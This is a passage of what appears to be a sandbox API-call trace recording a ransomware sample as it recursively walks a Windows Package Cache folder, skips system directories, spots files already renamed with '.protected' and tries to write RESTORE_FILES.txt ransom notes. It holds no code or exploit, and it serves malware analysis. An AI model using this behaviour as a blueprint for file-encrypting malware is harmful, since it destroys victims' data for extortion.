(lpString1="..", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.331] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\..") returned 95 [0093.331] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.331] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.331] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.331] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.331] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.331] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.331] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0093.331] lstrcmpiW 
(lpString1="x64", lpString2="Program Files (x86)") returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0093.331] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned 96 [0093.331] lstrcmpW (lpString1="x64", lpString2=".") returned 1 [0093.331] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0093.331] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*") returned 98 [0093.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.331] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.331] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.331] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.331] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.331] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\.") returned 98 [0093.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.331] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.331] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.331] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.331] lstrcmpiW (lpString1="..", 
lpString2="Program Files (x86)") returned -1 [0093.331] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\..") returned 99 [0093.332] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.332] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.332] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.332] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.332] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Windows") returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files") returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files (x86)") 
returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="$Recycle.bin") returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="System Volume Information") returned 1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 135 [0093.332] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu.protected", lpSrch=".protected") returned=".protected" [0093.332] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.332] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.332] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.332] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.332] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.332] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.332] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt") returned 104 [0093.332] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.332] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.332] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.333] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.333] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt") returned 104 [0093.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package 
cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.334] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.334] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt") returned 95 [0093.334] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.334] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.334] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.334] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.334] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt") returned 95 [0093.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.335] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.335] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\RESTORE_FILES.txt") returned 54 [0093.335] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.335] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.335] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files") returned -1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="System Volume Information") returned -1 [0093.335] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 86 [0093.335] lstrcmpW 
(lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2=".") returned 1 [0093.335] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="..") returned 1 [0093.335] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned 88 [0093.335] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.335] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.335] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\.") returned 88 [0093.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.335] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.335] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.336] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.336] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.336] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\..") returned 89 
[0093.336] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.336] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.336] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0093.336] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 95 [0093.336] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.336] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.336] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned 97 [0093.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.337] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.337] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.337] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\.") returned 97 [0093.337] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.337] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.337] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.337] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\..") returned 98 [0093.337] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.337] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.337] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.337] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 
[0093.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 116 [0093.337] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0093.337] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0093.337] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned 118 [0093.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.338] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.338] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\.") returned 118 [0093.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.338] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.338] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\..") returned 119 [0093.338] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="Program Files") returned -1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="Program Files (x86)") returned -1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 135 [0093.338] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") 
returned=".protected" [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.338] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.338] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="Program Files") returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="Program Files (x86)") returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="System Volume Information") returned 1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 152 [0093.338] 
